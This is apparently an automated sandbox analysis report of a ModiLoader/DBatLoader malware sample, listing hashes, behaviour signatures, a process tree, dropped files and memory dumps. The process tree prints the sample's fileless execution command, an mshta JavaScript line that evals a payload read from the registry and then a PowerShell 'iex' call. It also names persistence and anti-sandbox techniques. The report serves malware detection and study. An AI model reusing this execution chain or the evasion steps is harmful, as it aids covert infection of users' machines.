Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    04-05-2024 05:01

General

  • Target

    118efcc13349720fda57911483211b02_JaffaCakes118.exe

  • Size

    368KB

  • MD5

    118efcc13349720fda57911483211b02

  • SHA1

    8d305040a3453a6ea2fefa81214840123ca623ec

  • SHA256

    14445511f62011b381b70c70d3d816a6316368b560a5bd605e0fadb8d1d67918

  • SHA512

    010341ea9f1564d864a6eee00170851933edefaa50413fda65cc482953850fa606dce478f235638ba13637f7b9332d457a3b5acad8f2f88168af9e97d16e6dc9

  • SSDEEP

    6144:rpzihDNamsZbXSAcIs0o7TCV0sq2F9XDFOiwtXK/JOMp:dih0J8is0Q+V0eF9TFBYcp

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
  • Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
  • ModiLoader Second Stage 40 IoCs
  • Looks for VMWare Tools registry key 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 42 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\118efcc13349720fda57911483211b02_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\118efcc13349720fda57911483211b02_JaffaCakes118.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2796
    • C:\Users\Admin\AppData\Local\Temp\118efcc13349720fda57911483211b02_JaffaCakes118.exe
      "C:\Users\Admin\AppData\Local\Temp\118efcc13349720fda57911483211b02_JaffaCakes118.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1804
      • C:\Users\Admin\AppData\Local\Temp\0.exe
        "C:\Users\Admin\AppData\Local\Temp\0.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1144
        • C:\Users\Admin\AppData\Local\Temp\0.exe
          "C:\Users\Admin\AppData\Local\Temp\0.exe"
          4⤵
          • Executes dropped EXE
          PID:2652
  • C:\Windows\system32\mshta.exe
    "C:\Windows\system32\mshta.exe" javascript:IeOw68Xk="LHB";tZ29=new%20ActiveXObject("WScript.Shell");UoKTiJV5="Dx";nNrA54=tZ29.RegRead("HKLM\\software\\Wow6432Node\\xWGJkvV5Bw\\3iQz2MC");RpIaAH6xC="phwgmCwKQV";eval(nNrA54);k76teWrqi="IN";
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:2620
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:suko
      2⤵
      • Drops file in System32 directory
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2524
      • C:\Windows\SysWOW64\regsvr32.exe
        regsvr32.exe
        3⤵
        • Looks for VirtualBox Guest Additions in registry
        • Looks for VirtualBox drivers on disk
        • Looks for VMWare Tools registry key
        • Checks BIOS information in registry
        • Drops startup file
        • Adds Run key to start application
        • Maps connected drives based on registry
        • Suspicious use of SetThreadContext
        • Modifies Internet Explorer settings
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory
        PID:1816
        • C:\Windows\SysWOW64\regsvr32.exe
          "C:\Windows\SysWOW64\regsvr32.exe"
          4⤵
            PID:2076

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\529d1c\1bcd8a.lnk

      Filesize

      881B

      MD5

      1f10bb85754a7e795a07dc1a8fa11204

      SHA1

      8f2ed1e50d3ee051d545567c18f0674b0c69318c

      SHA256

      c865187b33716d78d9924ffcd04748480badba9a2c95e6ca738b8c938626c65d

      SHA512

      9c33a4e6ab1f9a1a6a29fe25656e9da42decf3dc18b81b828b5bd5d8582d1ed3a590118c5cc0900ee4382e1e1744064e68ee08881997789421952a0893aa1461

    • C:\Users\Admin\AppData\Local\529d1c\4bd7f2.bat

      Filesize

      61B

      MD5

      7f145f9c460ee7bb55a3e7ad72a65f86

      SHA1

      39a73f2119c72ae27a166fff9ceb13859f6ac21b

      SHA256

      16e3704ce7a5f142fe817cd42cf9fd214341caf20a284c439457feb84515ddad

      SHA512

      1bfbf2931d904ae08d6552267b918e8f7e6cce6d142f0c950c74e2e601dc3cf36428fcddf67ad3cae1acb565edf4871c0c3c165be88c34d3c81b68b8d7c1a75f

    • C:\Users\Admin\AppData\Local\529d1c\7fd902.cbe78f1

      Filesize

      39KB

      MD5

      9e5b711fe9e089c6cf871dbfa6aac253

      SHA1

      c2eacf0bbf070b5790cbe5e92e1f6fc53a971414

      SHA256

      85b49ee90e4c3e82ec31cf63e05e84218964ba14c15ea10c851e51caa9a257f5

      SHA512

      e54040df7fd709b0bec09b11cc7a08d21213a3dd461c6d7dd98792ce45cee888ed888aedd486c713fa6a2fe12c3dfba46e00d14ad2ce43c7d06eb1bbc7464fdd

    • C:\Users\Admin\AppData\Roaming\4f4be6\d3bc4d.cbe78f1

      Filesize

      15KB

      MD5

      5381f07daa923e70d78a829e6ac96f80

      SHA1

      1f587d86b88385faf4d2feb2d3bceab2ad4e3d6b

      SHA256

      e7a9cb6295b5c67bf4e758efbb64091891a4c3418e677ceab837ed51fb8f7b0b

      SHA512

      026367e1b1cd3b2e0e0e8827787318b26bcb29405e943740793ceb33789134e2353484dcbc56d5c8c5e58a4d83b700665f5c2da80bbd6576a507e77729e22b2e

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\54b061.lnk

      Filesize

      991B

      MD5

      3ea5356ec7643199ab02d733229db045

      SHA1

      b80a07599657cba578519155280ec42c4e5b7440

      SHA256

      15c1d340ff97644ea10ad327c54fe5fe9b23e068aa71aae033fad88eb26dfa26

      SHA512

      0d560e4f549e3731b1a964067874edb8bd2bde33874ad1805b8188716ac9a13899744fc092d908748086fec8c4a2700f2780c88fb26b257e42b8b1280968db09

    • \Users\Admin\AppData\Local\Temp\0.exe

      Filesize

      296KB

      MD5

      4ed6da10001dec308a436038ff943b89

      SHA1

      290d3118fb3c2f256c3c533fcddd8c413f65debb

      SHA256

      f1bb7c9bebc9b1fc7a4cb115c108fd30af91e28c6bca6af13fedf86556c1044f

      SHA512

      1b47b8161854fd7e15c169ead50edd4900c68a018eb30bb476e21101e94b06220aa2c41d650fe8acada2e70e0c1dd5822222ebdce2c16aedb46073c129e66749

    • memory/1804-2-0x0000000000400000-0x0000000000454000-memory.dmp

      Filesize

      336KB

    • memory/1804-14-0x0000000000400000-0x0000000000454000-memory.dmp

      Filesize

      336KB

    • memory/1804-11-0x0000000000400000-0x0000000000454000-memory.dmp

      Filesize

      336KB

    • memory/1804-10-0x0000000000400000-0x0000000000454000-memory.dmp

      Filesize

      336KB

    • memory/1804-0-0x0000000000400000-0x0000000000454000-memory.dmp

      Filesize

      336KB

    • memory/1804-4-0x0000000000400000-0x0000000000454000-memory.dmp

      Filesize

      336KB

    • memory/1804-8-0x0000000000400000-0x0000000000454000-memory.dmp

      Filesize

      336KB

    • memory/1804-6-0x0000000000400000-0x0000000000454000-memory.dmp

      Filesize

      336KB

    • memory/1816-71-0x00000000001B0000-0x00000000002EE000-memory.dmp

      Filesize

      1.2MB

    • memory/1816-76-0x00000000001B0000-0x00000000002EE000-memory.dmp

      Filesize

      1.2MB

    • memory/1816-79-0x00000000001B0000-0x00000000002EE000-memory.dmp

      Filesize

      1.2MB

    • memory/1816-81-0x00000000001B0000-0x00000000002EE000-memory.dmp

      Filesize

      1.2MB

    • memory/1816-80-0x00000000001B0000-0x00000000002EE000-memory.dmp

      Filesize

      1.2MB

    • memory/1816-65-0x00000000001B0000-0x00000000002EE000-memory.dmp

      Filesize

      1.2MB

    • memory/1816-59-0x00000000001B0000-0x00000000002EE000-memory.dmp

      Filesize

      1.2MB

    • memory/1816-66-0x00000000001B0000-0x00000000002EE000-memory.dmp

      Filesize

      1.2MB

    • memory/1816-68-0x00000000001B0000-0x00000000002EE000-memory.dmp

      Filesize

      1.2MB

    • memory/1816-69-0x00000000001B0000-0x00000000002EE000-memory.dmp

      Filesize

      1.2MB

    • memory/1816-73-0x00000000001B0000-0x00000000002EE000-memory.dmp

      Filesize

      1.2MB

    • memory/1816-55-0x00000000001B0000-0x00000000002EE000-memory.dmp

      Filesize

      1.2MB

    • memory/1816-56-0x00000000001B0000-0x00000000002EE000-memory.dmp

      Filesize

      1.2MB

    • memory/1816-62-0x00000000001B0000-0x00000000002EE000-memory.dmp

      Filesize

      1.2MB

    • memory/1816-63-0x00000000001B0000-0x00000000002EE000-memory.dmp

      Filesize

      1.2MB

    • memory/1816-67-0x00000000001B0000-0x00000000002EE000-memory.dmp

      Filesize

      1.2MB

    • memory/1816-60-0x00000000001B0000-0x00000000002EE000-memory.dmp

      Filesize

      1.2MB

    • memory/1816-70-0x00000000001B0000-0x00000000002EE000-memory.dmp

      Filesize

      1.2MB

    • memory/1816-72-0x00000000001B0000-0x00000000002EE000-memory.dmp

      Filesize

      1.2MB

    • memory/1816-61-0x00000000001B0000-0x00000000002EE000-memory.dmp

      Filesize

      1.2MB

    • memory/1816-74-0x00000000001B0000-0x00000000002EE000-memory.dmp

      Filesize

      1.2MB

    • memory/1816-64-0x00000000001B0000-0x00000000002EE000-memory.dmp

      Filesize

      1.2MB

    • memory/1816-77-0x00000000001B0000-0x00000000002EE000-memory.dmp

      Filesize

      1.2MB

    • memory/1816-78-0x00000000001B0000-0x00000000002EE000-memory.dmp

      Filesize

      1.2MB

    • memory/1816-75-0x00000000001B0000-0x00000000002EE000-memory.dmp

      Filesize

      1.2MB

    • memory/2524-53-0x00000000060E0000-0x00000000061B4000-memory.dmp

      Filesize

      848KB

    • memory/2524-58-0x00000000060E0000-0x00000000061B4000-memory.dmp

      Filesize

      848KB

    • memory/2652-41-0x0000000001D80000-0x0000000001E54000-memory.dmp

      Filesize

      848KB

    • memory/2652-35-0x0000000000400000-0x0000000000439000-memory.dmp

      Filesize

      228KB

    • memory/2652-44-0x0000000001D80000-0x0000000001E54000-memory.dmp

      Filesize

      848KB

    • memory/2652-43-0x0000000001D80000-0x0000000001E54000-memory.dmp

      Filesize

      848KB

    • memory/2652-39-0x0000000001D80000-0x0000000001E54000-memory.dmp

      Filesize

      848KB

    • memory/2652-40-0x0000000001D80000-0x0000000001E54000-memory.dmp

      Filesize

      848KB

    • memory/2652-36-0x0000000000400000-0x0000000000439000-memory.dmp

      Filesize

      228KB

    • memory/2652-42-0x0000000001D80000-0x0000000001E54000-memory.dmp

      Filesize

      848KB

    • memory/2652-38-0x0000000001D80000-0x0000000001E54000-memory.dmp

      Filesize

      848KB

    • memory/2652-37-0x0000000000400000-0x0000000000439000-memory.dmp

      Filesize

      228KB

    • memory/2652-26-0x0000000000400000-0x0000000000439000-memory.dmp

      Filesize

      228KB

    • memory/2652-28-0x0000000000400000-0x0000000000439000-memory.dmp

      Filesize

      228KB

    • memory/2652-30-0x0000000000400000-0x0000000000439000-memory.dmp

      Filesize

      228KB

    • memory/2652-32-0x0000000000400000-0x0000000000439000-memory.dmp

      Filesize

      228KB

    • memory/2652-24-0x0000000000400000-0x0000000000439000-memory.dmp

      Filesize

      228KB